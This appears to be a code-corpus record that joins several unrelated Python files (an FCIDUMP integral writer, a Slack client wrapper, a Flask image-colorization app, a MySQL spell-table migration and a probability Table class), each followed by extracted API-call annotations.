outfile.write(' ORBSYM=' + ','.join(orbsym) + '\n')
outfile.write(' ISYM={:d},\n/&END\n'.format(isym))
# append 2e integrals
_dump_2e_ints(hijkl, mos, outfile)
if hijkl_ba is not None:
_dump_2e_ints(hijkl_ba.transpose(), mos, outfile, beta=1)
if hijkl_bb is not None:
_dump_2e_ints(hijkl_bb, mos, outfile, beta=2)
# append 1e integrals
_dump_1e_ints(hij, mos, outfile)
if hij_b is not None:
_dump_1e_ints(hij_b, mos, outfile, beta=True)
# TODO append MO energies (last three indices are 0)
# append inactive energy
_write_to_outfile(outfile, einact, (0, 0, 0, 0))
def _dump_1e_ints(hij: List[float], mos: List[int], outfile: TextIOWrapper,
beta: bool = False) -> None:
idx_offset = 1 if not beta else 1+len(mos)
hij_elements = set()
for i, j in itertools.product(mos, repeat=2):
if i == j:
_write_to_outfile(outfile, hij[i][j], (i+idx_offset, j+idx_offset, 0, 0))
continue
if (j, i) in hij_elements and np.isclose(hij[i][j], hij[j][i]):
continue
_write_to_outfile(outfile, hij[i][j], (i+idx_offset, j+idx_offset, 0, 0))
hij_elements.add((i, j))
def _dump_2e_ints(hijkl: List[float], mos: List[int], outfile: TextIOWrapper,
beta: int = 0) -> None:
idx_offsets = [1, 1]
for b in range(beta):
idx_offsets[1-b] += len(mos)
hijkl_elements = set()
# pylint: disable=invalid-name
for elem in itertools.product(mos, repeat=4):
if np.isclose(hijkl[elem], 0.0, atol=1e-14):
continue
if len(set(elem)) == 1:
_write_to_outfile(outfile, hijkl[elem], (*[e+idx_offsets[0] for e in elem[:2]],
*[e+idx_offsets[1] for e in elem[2:]]))
continue
if beta != 1 and elem[::-1] in hijkl_elements and \
np.isclose(hijkl[elem], hijkl[elem[::-1]]):
continue
bra_perms = set(itertools.permutations(elem[:2]))
ket_perms = set(itertools.permutations(elem[2:]))
if beta == 1:
permutations = itertools.product(bra_perms, ket_perms)
else:
permutations = itertools.chain(
itertools.product(bra_perms, ket_perms),
itertools.product(ket_perms, bra_perms)
)
for perm in {e1 + e2 for e1, e2 in permutations}:
if perm in hijkl_elements and np.isclose(hijkl[elem], hijkl[perm]):
break
else:
_write_to_outfile(outfile, hijkl[elem], (*[e+idx_offsets[0] for e in elem[:2]],
*[e+idx_offsets[1] for e in elem[2:]]))
hijkl_elements.add(elem)
def _write_to_outfile(outfile: str, value: float, indices: List[int]):
outfile.write('{:23.16E}{:4d}{:4d}{:4d}{:4d}\n'.format(value, *indices))
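# Minimal usage sketch (not part of the original module).  The integral values
# below are arbitrary placeholders chosen only to exercise the writer for a
# restricted (alpha-only) two-orbital system.
if __name__ == '__main__':
    norb = 2
    hij = np.array([[-1.25, 0.0], [0.0, -0.47]])
    hijkl = np.zeros((norb, norb, norb, norb))
    hijkl[0, 0, 0, 0] = 0.67
    hijkl[1, 1, 1, 1] = 0.65
    dump('example.fcidump', norb=norb, nelec=2,
         hijs=(hij, None), hijkls=(hijkl, None, None), einact=0.71)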
| [
"itertools.permutations",
"itertools.product",
"numpy.isclose"
] | [((3021, 3053), 'itertools.product', 'itertools.product', (['mos'], {'repeat': '(2)'}), '(mos, repeat=2)\n', (3038, 3053), False, 'import itertools\n'), ((3677, 3709), 'itertools.product', 'itertools.product', (['mos'], {'repeat': '(4)'}), '(mos, repeat=4)\n', (3694, 3709), False, 'import itertools\n'), ((3722, 3762), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', '(0.0)'], {'atol': '(1e-14)'}), '(hijkl[elem], 0.0, atol=1e-14)\n', (3732, 3762), True, 'import numpy as np\n'), ((3219, 3251), 'numpy.isclose', 'np.isclose', (['hij[i][j]', 'hij[j][i]'], {}), '(hij[i][j], hij[j][i])\n', (3229, 3251), True, 'import numpy as np\n'), ((4099, 4141), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', 'hijkl[elem[::-1]]'], {}), '(hijkl[elem], hijkl[elem[::-1]])\n', (4109, 4141), True, 'import numpy as np\n'), ((4188, 4220), 'itertools.permutations', 'itertools.permutations', (['elem[:2]'], {}), '(elem[:2])\n', (4210, 4220), False, 'import itertools\n'), ((4246, 4278), 'itertools.permutations', 'itertools.permutations', (['elem[2:]'], {}), '(elem[2:])\n', (4268, 4278), False, 'import itertools\n'), ((4329, 4368), 'itertools.product', 'itertools.product', (['bra_perms', 'ket_perms'], {}), '(bra_perms, ket_perms)\n', (4346, 4368), False, 'import itertools\n'), ((4443, 4482), 'itertools.product', 'itertools.product', (['bra_perms', 'ket_perms'], {}), '(bra_perms, ket_perms)\n', (4460, 4482), False, 'import itertools\n'), ((4500, 4539), 'itertools.product', 'itertools.product', (['ket_perms', 'bra_perms'], {}), '(ket_perms, bra_perms)\n', (4517, 4539), False, 'import itertools\n'), ((4654, 4690), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', 'hijkl[perm]'], {}), '(hijkl[elem], hijkl[perm])\n', (4664, 4690), True, 'import numpy as np\n')] |
import os
import time
from parsons.etl.table import Table
from parsons.utilities.check_env import check
from slackclient import SlackClient
from slackclient.exceptions import SlackClientError
import requests
class Slack(object):
def __init__(self, api_key=None):
if api_key is None:
try:
self.api_key = os.environ["SLACK_API_TOKEN"]
except KeyError:
raise KeyError('Missing api_key. It must be passed as an '
'argument or stored as environmental variable')
else:
self.api_key = api_key
self.client = SlackClient(self.api_key)
def channels(self, fields=['id', 'name'], exclude_archived=False,
types=['public_channel']):
"""
Return a list of all channels in a Slack team.
`Args:`
fields: list
A list of the fields to return. By default, only the channel
`id` and `name` are returned. See
https://api.slack.com/methods/conversations.list for a full
list of available fields. `Notes:` nested fields are unpacked.
exclude_archived: bool
Set to `True` to exclude archived channels from the list.
Default is false.
types: list
Mix and match channel types by providing a list of any
combination of `public_channel`, `private_channel`,
`mpim` (aka group messages), or `im` (aka 1-1 messages).
`Returns:`
Parsons Table
See :ref:`parsons-table` for output options.
"""
tbl = self._paginate_request(
"conversations.list", "channels", types=types,
exclude_archived=exclude_archived)
tbl.unpack_dict("topic", include_original=False, prepend=True,
prepend_value="topic")
tbl.unpack_dict("purpose", include_original=False,
prepend=True, prepend_value="purpose")
rm_cols = [x for x in tbl.columns if x not in fields]
tbl.remove_column(*rm_cols)
return tbl
def users(self, fields=['id', 'name', 'deleted', 'profile_real_name_normalized',
'profile_email']):
"""
Return a list of all users in a Slack team.
`Args:`
fields: list
A list of the fields to return. By default, only the user
`id` and `name` and `deleted` status are returned. See
https://api.slack.com/methods/users.list for a full list of
available fields. `Notes:` nested fields are unpacked.
`Returns:`
Parsons Table
See :ref:`parsons-table` for output options.
"""
tbl = self._paginate_request("users.list", "members", include_locale=True)
tbl.unpack_dict("profile", include_original=False, prepend=True,
prepend_value="profile")
rm_cols = [x for x in tbl.columns if x not in fields]
tbl.remove_column(*rm_cols)
return tbl
@classmethod
def message(cls, channel, text, webhook=None, parent_message_id=None):
"""
Send a message to a Slack channel with a webhook instead of an api_key.
You might not have the full-access API key but still want to notify a channel
`Args:`
channel: str
The name or id of a `public_channel`, a `private_channel`, or
an `im` (aka 1-1 message).
text: str
Text of the message to send.
webhook: str
If you have a webhook url instead of an api_key
Looks like: https://<KEY>
parent_message_id: str
The `ts` value of the parent message. If used, this will thread the message.
"""
webhook = check('SLACK_API_WEBHOOK', webhook, optional=True)
payload = {'channel': channel, 'text': text}
if parent_message_id:
payload['thread_ts'] = parent_message_id
return requests.post(webhook, json=payload)
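    # Illustrative call (not in the original source; channel and text are placeholders):
    #   Slack.message('#alerts', 'nightly sync finished', webhook=os.environ['SLACK_API_WEBHOOK'])
    # posts without a full API token because the payload goes straight to the webhook URL.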
def message_channel(self, channel, text, as_user=False, parent_message_id=None):
"""
Send a message to a Slack channel
`Args:`
channel: str
The name or id of a `public_channel`, a `private_channel`, or
an `im` (aka 1-1 message).
text: str
Text of the message to send.
as_user: str
Pass true to post the message as the authenticated user,
instead of as a bot. Defaults to false. See
https://api.slack.com/methods/chat.postMessage#authorship for
more information about Slack authorship.
parent_message_id: str
The `ts` value of the parent message. If used, this will thread the message.
`Returns:`
`dict`:
A response json
"""
resp = self.client.api_call(
"chat.postMessage", channel=channel, text=text,
as_user=as_user, thread_ts=parent_message_id)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
resp = self.client.api_call(
"chat.postMessage",
channel=channel, text=text, as_user=as_user)
raise SlackClientError(resp['error'])
return resp
def upload_file(self, channels, filename, filetype=None,
initial_comment=None, title=None, is_binary=False):
"""
Upload a file to Slack channel(s).
`Args:`
channels: list
The list of channel names or IDs where the file will be shared.
filename: str
The path to the file to be uploaded.
filetype: str
A file type identifier. If None, type will be inferred base on
file extension. This is used to determine what fields are
available for that object. See https://api.slack.com/types/file
for a list of valid types and for more information about the
file object.
initial_comment: str
The text of the message to send along with the file.
title: str
Title of the file to be uploaded.
is_binary: bool
If True, open this file in binary mode. This is needed if
uploading binary files. Defaults to False.
`Returns:`
`dict`:
A response json
"""
if filetype is None and '.' in filename:
filetype = filename.split('.')[-1]
mode = 'rb' if is_binary else 'r'
with open(filename, mode) as file_content:
resp = self.client.api_call(
"files.upload", channels=channels, file=file_content,
filetype=filetype, initial_comment=initial_comment,
title=title)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
resp = self.client.api_call(
"files.upload", channels=channels, file=file_content,
filetype=filetype, initial_comment=initial_comment,
title=title)
raise SlackClientError(resp['error'])
return resp
def _paginate_request(self, endpoint, collection, **kwargs):
        # The max number of objects we're requesting at a time.
        # This is an internal limit to avoid overloading the Slack API.
LIMIT = 200
items = []
next_page = True
cursor = None
while next_page:
resp = self.client.api_call(
endpoint, cursor=cursor, limit=LIMIT, **kwargs)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
continue
raise SlackClientError(resp['error'])
items.extend(resp[collection])
if resp["response_metadata"]["next_cursor"]:
cursor = resp["response_metadata"]["next_cursor"]
else:
next_page = False
return Table(items)
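# Usage sketch (not part of the original module).  The channel name and message
# text are placeholders; a real run needs a valid SLACK_API_TOKEN in the
# environment and a bot that is allowed to post to the chosen channel.
if __name__ == '__main__':
    client = Slack()               # reads SLACK_API_TOKEN from the environment
    print(client.channels())      # Parsons Table of public channel ids and names
    client.message_channel('#general', 'Hello from parsons.Slack!')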
| [
"requests.post",
"slackclient.exceptions.SlackClientError",
"slackclient.SlackClient",
"parsons.etl.table.Table",
"parsons.utilities.check_env.check"
] | [((639, 664), 'slackclient.SlackClient', 'SlackClient', (['self.api_key'], {}), '(self.api_key)\n', (650, 664), False, 'from slackclient import SlackClient\n'), ((3936, 3986), 'parsons.utilities.check_env.check', 'check', (['"""SLACK_API_WEBHOOK"""', 'webhook'], {'optional': '(True)'}), "('SLACK_API_WEBHOOK', webhook, optional=True)\n", (3941, 3986), False, 'from parsons.utilities.check_env import check\n'), ((4138, 4174), 'requests.post', 'requests.post', (['webhook'], {'json': 'payload'}), '(webhook, json=payload)\n', (4151, 4174), False, 'import requests\n'), ((8479, 8491), 'parsons.etl.table.Table', 'Table', (['items'], {}), '(items)\n', (8484, 8491), False, 'from parsons.etl.table import Table\n'), ((5514, 5545), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (5530, 5545), False, 'from slackclient.exceptions import SlackClientError\n'), ((7557, 7588), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (7573, 7588), False, 'from slackclient.exceptions import SlackClientError\n'), ((8211, 8242), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (8227, 8242), False, 'from slackclient.exceptions import SlackClientError\n')] |
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
import os
from keras.models import load_model
from keras.applications.inception_resnet_v2 import InceptionResNetV2
import tensorflow as tf
from skimage.io import imsave
from skimage.transform import resize
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb
from keras.applications.inception_resnet_v2 import preprocess_input
from PIL import Image,ImageChops
import logging
global graph
graph = tf.get_default_graph()
app = Flask(__name__)
app.secret_key = "hello"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
model = load_model('trained-model.h5')
UPLOAD_FOLDER = '/home/nubaf/Git-Projects/colorization/files'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
files = [f for f in os.listdir('.') if os.path.isfile(f)]
checkInception = False
for f in files:
if f == "inception.h5":
checkInception = True
inception = load_model('inception.h5', compile=False)
break
if not checkInception:
inception = InceptionResNetV2(weights='imagenet', include_top=True)
inception.save('inception.h5')
inception.graph = graph
def create_inception_embedding(grayscaled_rgb):
grayscaled_rgb_resized = []
for i in grayscaled_rgb:
i = resize(i, (299, 299, 3), mode='constant')
grayscaled_rgb_resized.append(i)
grayscaled_rgb_resized = np.array(grayscaled_rgb_resized)
grayscaled_rgb_resized = preprocess_input(grayscaled_rgb_resized)
with graph.as_default():
embed = inception.predict(grayscaled_rgb_resized)
return embed
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
try:
url = request.form['url']
if 'examples' in url:
color_file = process(url)
return render_template('index.html', res='static/examples/girl.jpg')
# check if the post request has the file part
except:
logging.exception('')
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
color_file = process(file.filename)
return render_template('index.html', og=color_file[0], res=color_file[1])
return render_template('index.html')
def process(img):
if 'examples' in img:
im = Image.open(img)
name = img.split('.')[0].split('/')[-1]
else:
im = Image.open('files/' + img)
name = img.split('.')[0]
old_size = im.size # old_size[0] is in (width, height) format
ratio = float(256)/max(old_size)
new_size = tuple([int(x*ratio) for x in old_size])
im = im.resize(new_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (256, 256))
new_im.paste(im, ((256-new_size[0])//2,(256-new_size[1])//2))
new_im.save('static/processed_png/' + name + ".png","PNG")
a = np.array(img_to_array(load_img('static/processed_png/' + name +'.png')))
a = a.reshape(1,256,256,3)
#gray_me = gray2rgb(rgb2gray(1.0/255*a))
color_me_embed = create_inception_embedding(a)
    # convert to LAB colour space and keep only the L (lightness) channel
    a = rgb2lab(1.0/255*a)[:,:,:,0]
a = a.reshape(a.shape+(1,))
with graph.as_default():
output = model.predict([a, color_me_embed])
    # rescale the predicted a/b channels from [-1, 1] back to the LAB range
    output = output * 128
for i in range(len(output)):
cur = np.zeros((256, 256, 3))
cur[:,:,0] = a[i][:,:,0]
cur[:,:,1:] = output[i]
imsave(f'static/colored_img/{name}.png',(lab2rgb(cur)))
trim(Image.open(f'static/processed_png/{name}.png')).save(f'static/processed_png/{name}.png')
trim(Image.open(f'static/colored_img/{name}.png')).save(f'static/colored_img/{name}.png')
return (f'static/processed_png/{name}.png',f'static/colored_img/{name}.png')
def trim(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
return im.crop(bbox)
if __name__ == "__main__":
app.run(debug=True)
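# --- Hedged usage sketch (not part of the original app) ---
# With the server running locally (Flask's default is http://127.0.0.1:5000),
# an image can be submitted through the HTML form or programmatically, e.g.:
#
#   import requests
#   with open('photo.jpg', 'rb') as fh:   # 'photo.jpg' is a hypothetical input file
#       requests.post('http://127.0.0.1:5000/', files={'file': fh})
#
# The response is index.html rendered with links to the padded input PNG under
# static/processed_png/ and the colorized PNG under static/colored_img/.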
| [
"flask.render_template",
"flask.Flask",
"PIL.Image.new",
"logging.exception",
"numpy.array",
"werkzeug.utils.secure_filename",
"os.listdir",
"skimage.color.rgb2lab",
"flask.flash",
"keras.applications.inception_resnet_v2.preprocess_input",
"skimage.color.lab2rgb",
"keras.applications.inception... | [((642, 664), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (662, 664), True, 'import tensorflow as tf\n'), ((671, 686), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (676, 686), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((769, 799), 'keras.models.load_model', 'load_model', (['"""trained-model.h5"""'], {}), "('trained-model.h5')\n", (779, 799), False, 'from keras.models import load_model\n'), ((1176, 1231), 'keras.applications.inception_resnet_v2.InceptionResNetV2', 'InceptionResNetV2', ([], {'weights': '"""imagenet"""', 'include_top': '(True)'}), "(weights='imagenet', include_top=True)\n", (1193, 1231), False, 'from keras.applications.inception_resnet_v2 import InceptionResNetV2\n'), ((1526, 1558), 'numpy.array', 'np.array', (['grayscaled_rgb_resized'], {}), '(grayscaled_rgb_resized)\n', (1534, 1558), True, 'import numpy as np\n'), ((1588, 1628), 'keras.applications.inception_resnet_v2.preprocess_input', 'preprocess_input', (['grayscaled_rgb_resized'], {}), '(grayscaled_rgb_resized)\n', (1604, 1628), False, 'from keras.applications.inception_resnet_v2 import preprocess_input\n'), ((2969, 2998), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (2984, 2998), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((3422, 3450), 'PIL.Image.new', 'Image.new', (['"""RGB"""', '(256, 256)'], {}), "('RGB', (256, 256))\n", (3431, 3450), False, 'from PIL import Image, ImageChops\n'), ((4569, 4598), 'PIL.ImageChops.difference', 'ImageChops.difference', (['im', 'bg'], {}), '(im, bg)\n', (4590, 4598), False, 'from PIL import Image, ImageChops\n'), ((4610, 4647), 'PIL.ImageChops.add', 'ImageChops.add', (['diff', 'diff', '(2.0)', '(-100)'], {}), '(diff, diff, 2.0, -100)\n', (4624, 4647), False, 'from PIL import Image, ImageChops\n'), ((926, 941), 'os.listdir', 'os.listdir', (['"""."""'], {}), "('.')\n", (936, 941), False, 'import os\n'), ((945, 962), 'os.path.isfile', 'os.path.isfile', (['f'], {}), '(f)\n', (959, 962), False, 'import os\n'), ((1081, 1122), 'keras.models.load_model', 'load_model', (['"""inception.h5"""'], {'compile': '(False)'}), "('inception.h5', compile=False)\n", (1091, 1122), False, 'from keras.models import load_model\n'), ((1414, 1455), 'skimage.transform.resize', 'resize', (['i', '(299, 299, 3)'], {'mode': '"""constant"""'}), "(i, (299, 299, 3), mode='constant')\n", (1420, 1455), False, 'from skimage.transform import resize\n'), ((3057, 3072), 'PIL.Image.open', 'Image.open', (['img'], {}), '(img)\n', (3067, 3072), False, 'from PIL import Image, ImageChops\n'), ((3144, 3170), 'PIL.Image.open', 'Image.open', (["('files/' + img)"], {}), "('files/' + img)\n", (3154, 3170), False, 'from PIL import Image, ImageChops\n'), ((3796, 3818), 'skimage.color.rgb2lab', 'rgb2lab', (['(1.0 / 255 * a)'], {}), '(1.0 / 255 * a)\n', (3803, 3818), False, 'from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb\n'), ((2332, 2353), 'flask.flash', 'flash', (['"""No file part"""'], {}), "('No file part')\n", (2337, 2353), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2373, 2394), 'flask.redirect', 'redirect', (['request.url'], {}), '(request.url)\n', (2381, 2394), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2577, 2602), 'flask.flash', 'flash', (['"""No selected file"""'], {}), "('No selected file')\n", (2582, 
2602), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2622, 2643), 'flask.redirect', 'redirect', (['request.url'], {}), '(request.url)\n', (2630, 2643), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2716, 2746), 'werkzeug.utils.secure_filename', 'secure_filename', (['file.filename'], {}), '(file.filename)\n', (2731, 2746), False, 'from werkzeug.utils import secure_filename\n'), ((2889, 2955), 'flask.render_template', 'render_template', (['"""index.html"""'], {'og': 'color_file[0]', 'res': 'color_file[1]'}), "('index.html', og=color_file[0], res=color_file[1])\n", (2904, 2955), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((3610, 3659), 'keras.preprocessing.image.load_img', 'load_img', (["('static/processed_png/' + name + '.png')"], {}), "('static/processed_png/' + name + '.png')\n", (3618, 3659), False, 'from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n'), ((4022, 4045), 'numpy.zeros', 'np.zeros', (['(256, 256, 3)'], {}), '((256, 256, 3))\n', (4030, 4045), True, 'import numpy as np\n'), ((2114, 2175), 'flask.render_template', 'render_template', (['"""index.html"""'], {'res': '"""static/examples/girl.jpg"""'}), "('index.html', res='static/examples/girl.jpg')\n", (2129, 2175), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2258, 2279), 'logging.exception', 'logging.exception', (['""""""'], {}), "('')\n", (2275, 2279), False, 'import logging\n'), ((2769, 2820), 'os.path.join', 'os.path.join', (["app.config['UPLOAD_FOLDER']", 'filename'], {}), "(app.config['UPLOAD_FOLDER'], filename)\n", (2781, 2820), False, 'import os\n'), ((4172, 4184), 'skimage.color.lab2rgb', 'lab2rgb', (['cur'], {}), '(cur)\n', (4179, 4184), False, 'from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb\n'), ((4204, 4250), 'PIL.Image.open', 'Image.open', (['f"""static/processed_png/{name}.png"""'], {}), "(f'static/processed_png/{name}.png')\n", (4214, 4250), False, 'from PIL import Image, ImageChops\n'), ((4310, 4354), 'PIL.Image.open', 'Image.open', (['f"""static/colored_img/{name}.png"""'], {}), "(f'static/colored_img/{name}.png')\n", (4320, 4354), False, 'from PIL import Image, ImageChops\n')] |
import utils
import mysql.connector
def migration_name():
return "Spell blobs to spell table"
def check_preconditions(cur):
cur.execute("SHOW TABLES LIKE 'char_spells';")
if not cur.fetchone():
raise Exception("char_spells table does not exist. Please run sql/char_spells.sql")
def needs_to_run(cur):
# ensure char_spells table is empty
cur.execute("SELECT count(*) FROM char_spells")
row = cur.fetchone()
if row[0] != 0:
return False
# ensure spells column exists
cur.execute("SHOW COLUMNS FROM chars LIKE 'spells';")
if not cur.fetchone():
return False
return True
def migrate(cur, db):
try:
spellLimit = 1024
cur.execute("SELECT charid, HEX(spells) as spells FROM chars")
rows = cur.fetchall()
for row in rows:
charId = row[0]
spells = row[1]
if spells != None and spells != "":
print("Migrating charid: %d" % charId)
spellId = 0
binary_spells = utils.blob_to_binary(spells)
for bit in binary_spells:
if bit == "1":
if spellId >= spellLimit:
print("Going over spell limit of %d, not adding %d" % (spellLimit, spellId))
else:
cur.execute("INSERT IGNORE INTO char_spells VALUES (%s, %s);", (charId, spellId))
# print("Added spell %d" % spellId)
spellId = spellId + 1
print(" [OK]")
else:
print("Charid %d has no spells, skipping" % charId)
db.commit()
except mysql.connector.Error as err:
print("Something went wrong: {}".format(err)) | [
"utils.blob_to_binary"
] | [((1051, 1079), 'utils.blob_to_binary', 'utils.blob_to_binary', (['spells'], {}), '(spells)\n', (1071, 1079), False, 'import utils\n')] |
from collections import ChainMap
from collections.abc import Mapping, Iterable
from itertools import groupby
from operator import itemgetter
import numpy as np
from probability import RowKey
from probability import TableColumns
# from probability.core_1 import RowKey
# from probability.core_1 import TableColumns
def to_dict(groupby_index, value_index):
def make_dict(sorted_items):
# It groups the sorted item based on
# the element as groupby_index
# and then sum the values at value_index
return {
k: sum([item[value_index] for item in g2])
for k, g2 in groupby(sorted_items, key=itemgetter(groupby_index))
}
return make_dict
class Table(dict):
def __init__(self, rows, names=None, _internal_=False, _children_names_=None):
if _internal_:
# rows are dictionary for internal calls
key_values = rows
try:
self._row_sample_ = next(iter(rows))
except StopIteration:
# Rows are empty
super().__init__(key_values)
self._row_sample_ = None
self.names = names
if _children_names_ is None:
self.children_names = []
self.columns = TableColumns(
names=names, children_names=[], table=self
)
else:
self.children_names = _children_names_
self.columns = TableColumns(
names=names, children_names=_children_names_, table=self
)
return
else:
if isinstance(rows, Mapping):
key_values = [(RowKey(k), value) for k, value in rows.items()]
elif isinstance(rows, Iterable):
key_values = [(RowKey(k), value) for k, value in rows]
else:
raise ValueError("Table expect rows as Mapping/Iterable")
self._row_sample_ = key_values[0][0]
if names is None:
names = [f"X{i+1}" for i, _ in enumerate(self._row_sample_)]
if len(names) != len(self._row_sample_):
raise ValueError("The length of column names and columns are not the same.")
super().__init__(key_values)
self.names = names
value_sample = super().__getitem__(self._row_sample_)
if isinstance(value_sample, Table):
self.columns = TableColumns(
names=names, children_names=value_sample.names, table=self
)
self.children_names = value_sample.names
else:
if _children_names_ is None:
self.children_names = []
self.columns = TableColumns(names=names, children_names=[], table=self)
else:
self.children_names = _children_names_
self.columns = TableColumns(
names=names, children_names=_children_names_, table=self
)
def __missing__(self, key):
return None
def __getitem__(self, args):
"""Override the dict by converting the
comma separated arguments to RowKey
"""
# This is faster than isinstance
# We are sure there is not any inheritance
# to deal with
if type(args) is RowKey:
return super().__getitem__(args)
if self.columns.size == 1:
key = self.columns.to_key(args)
else:
key = self.columns.to_key(*args)
return super().__getitem__(key)
def _check_keys_consistencies_(self):
# We suppose each column is positioned
# in a fix place of the n-tuple.
# Therefore, the levels of the column can be
# found by iterating over each tuple's item
# Convert each features line to tuple
first_row_types = [type(item) for item in self._row_sample_]
for row in self.keys():
            # compare lengths
            if len(row) != self.columns.size:
                raise ValueError("The lengths of the 'factors' are not consistent.")
            # compare the types of the row's elements
            comparisons = [
                isinstance(element, type_1)
                for element, type_1 in zip(row, first_row_types)
            ]
            if not all(comparisons):
                raise ValueError("The types of the 'factors' are not consistent.")
def to_2d_array(self):
"""Convert the distribution ( or the self._counter's
key:value) to a 2D numpy array where the array
rows are [[(RV_1, RV_2, ..., RV_n, count)],[...
Returns:
numpy ndarray:
A 2D numpy array that the its last column
is the counts.
"""
        return np.array([k + (v,) for k, v in self.items()], dtype=object)
def _product_(self, right):
"""Multiply two Tables.
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a Table.")
# Find common variables
# reorder commons based on their order in left_common_indices
commons = [
name for name in self.names if name in (set(self.names) & set(right.names))
]
# When there is no common variable, it is just a simple product
if len(commons) == 0:
names = np.r_[self.names, right.names]
return (
{
k1 + k2: v1 * v2
for k1, v1 in self.items()
for k2, v2 in right.items()
},
names,
)
# In the case that there is one or more common variables,
# the operation is similar to SQL inner join
# So, create a lookup for the left table, by using the
# common variables as key.
left_common_indices = [
i for i, name in enumerate(self.names) if name in commons
]
# the order in right must be the same as the left
# so we reorder the indices base on its left order
right_common_indices = [
i
for name in commons
for i, name2 in enumerate(right.names)
if name == name2
]
right_complement_indices = [
i for i, name in enumerate(right.names) if name not in commons
]
# Methods to split the keys
def l_comm(key):
return tuple([key[i] for i in left_common_indices])
def r_comm(key):
return tuple([key[i] for i in right_common_indices])
def r_comp(key):
return tuple([key[i] for i in right_complement_indices])
# left and right tables lookup
# left : (key:value) == (common_key: (left_key, left_value))
left_lookup = {}
for k, value in self.items():
comm = l_comm(k)
if comm in left_lookup:
left_lookup[comm] += [(k, value)]
else:
left_lookup[comm] = [(k, value)]
# right : (key:value) == (common_key: (right_compliment_key, right_value))
right_lookup = {}
for k, value in right.items():
comm = r_comm(k)
if comm in right_lookup:
right_lookup[comm] += [(r_comp(k), value)]
else:
right_lookup[comm] = [(r_comp(k), value)]
# The inner join happens over keys of two dictionaries (left_lookup and
# right_lookup).
prodcut_dict = {}
for comm, l_values in left_lookup.items():
if comm not in right_lookup:
continue
for left_key, left_value in l_values:
for right_comp, right_value in right_lookup[comm]:
# prodcut_dict values must be multiplied.
# prodcut_dict keys are the combination: (left, right_compliment).
prodcut_dict[left_key + right_comp] = left_value * right_value
# names are the combination of [left_names, right_compelements_names]
combined_names = np.r_[
self.names,
[name for name in right.names if name not in commons],
]
return (prodcut_dict, combined_names)
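        # Illustrative example (not in the original source): if self has names
        # ['X', 'Y'] and right has names ['Y', 'Z'], the common column is 'Y'.
        # Every left row is joined with every right row sharing the same 'Y'
        # value, the two values are multiplied, and the combined names become
        # ['X', 'Y', 'Z'].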
def marginal(self, *args, normalise=True):
"""Marginal of (group by) the Table over a set of columns.
P(X, Y, Z) -> P(X, Y) or P(X, Z) or P(Y, Z)
Args:
args (list):
                List of column names to be marginalised (summed out).
Raises:
ValueError:
Raises when one of the column names is
not defined.
Or raises when requested for all column names.
Returns:
Table: (rows, names).
"""
# check the validity of operation based on column names
if len(args) == self.columns.size:
raise ValueError("Cannot marginalize on all column names.")
# split columns to indices and comp_indices
columns_info = self.columns.split_columns(*args)
#
# Convert the key:values to 2D numpy array
# the array rows are (row, value)
arr = self.to_2d_array()
# filter the compliment columns
filtered_arr = np.c_[arr[:, columns_info.complimnet_indices], arr[:, -1]]
# split the 2d array's rows to a tuple of
# compliment columns (row[comp_indices])
# and count row[-1]
arr_gen = ((RowKey(row[:-1]), row[-1]) for row in filtered_arr)
# Before calling the groupby, we have to sort the generator
# by the tuple of compliment columns (index zero in itemgetter)
sorted_arr = sorted(arr_gen, key=itemgetter(0))
# since the values in each 'group' are
# (compliment columns, value)
# here we group by 'compliment columns' and apply
# the sum on the value. Then the dictionary of
# compliment columns:op_of_values
# is an acceptable argument for Table
grouped_arr = {
k: sum([item[1] for item in g])
for k, g in groupby(sorted_arr, key=itemgetter(0))
}
table = Table(grouped_arr, columns_info.complimnet_names, _internal_=True)
if normalise:
table.normalise()
return table
